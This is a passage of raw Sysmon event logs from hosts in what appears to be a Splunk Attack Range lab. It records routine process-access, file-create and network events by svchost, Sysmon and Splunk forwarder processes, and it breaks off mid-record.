10:53:45.486{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217138Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:45.486{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217137Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:45.486{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217136Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:45.486{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217135Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:45.486{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217134Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:45.486{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217133Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:45.486{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217132Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:45.486{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-1239-6216-6D04-000000003902}3052C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217131Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:45.486{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1239-6216-6D04-000000003902}3052C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000217130Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:45.487{4F8D34B0-1239-6216-6D04-000000003902}3052C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000217129Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:45.267{4F8D34B0-1238-6216-6C04-000000003902}5161944C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000217148Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:46.923{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A36C1C897ADAED5E3185A450AB89DB82,SHA256=8E7EBB7DF182F97E380BD97F9C44D0A2EFF3D8B0C5CF0411F4501948518317D2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289266Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:46.697{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2E545B4AEFA45F61B8A7F1103F66CCC4,SHA256=E5DC6CC7BD9F3942BDEAFA15803050BCB02990FBE4F2A9B096481E35D4993482,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000217147Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:43.478{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51375-false10.0.1.12-8000- 23542300x8000000000000000217146Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:46.064{4F8D34B0-F11D-6215-2300-000000003902}2036NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217145Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:46.048{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=028EA05743DE6C1DA75AF6AF1F040AD7,SHA256=B970B29C1C04B39E257B38CDD6D3E88A0472579807F24F0624E4405AF9D5B7FD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217144Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:46.048{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1BF999DE78A3DE156C9E75BAF6A6C099,SHA256=AD9BB0435868FC1DA0F8205DAFB8ED66A3088A402EF69DB005CD9AC3457D4558,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000217177Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:47.923{4F8D34B0-123B-6216-6F04-000000003902}16443792C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000289272Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:47.713{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FBC10D2AD384E4635ADBD22DBE4365D9,SHA256=FFA742526620A67D5107D7B32A4FFAA91DB42A4000045912615746872DA4DA0D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000217176Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:47.705{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-123B-6216-6F04-000000003902}1644C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217175Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:47.705{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217174Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:47.705{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217173Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:47.705{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217172Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:47.705{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217171Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:47.705{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217170Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:47.705{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217169Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:47.705{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217168Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:47.705{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217167Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:47.705{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217166Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:47.705{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-123B-6216-6F04-000000003902}1644C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217165Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:47.705{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program 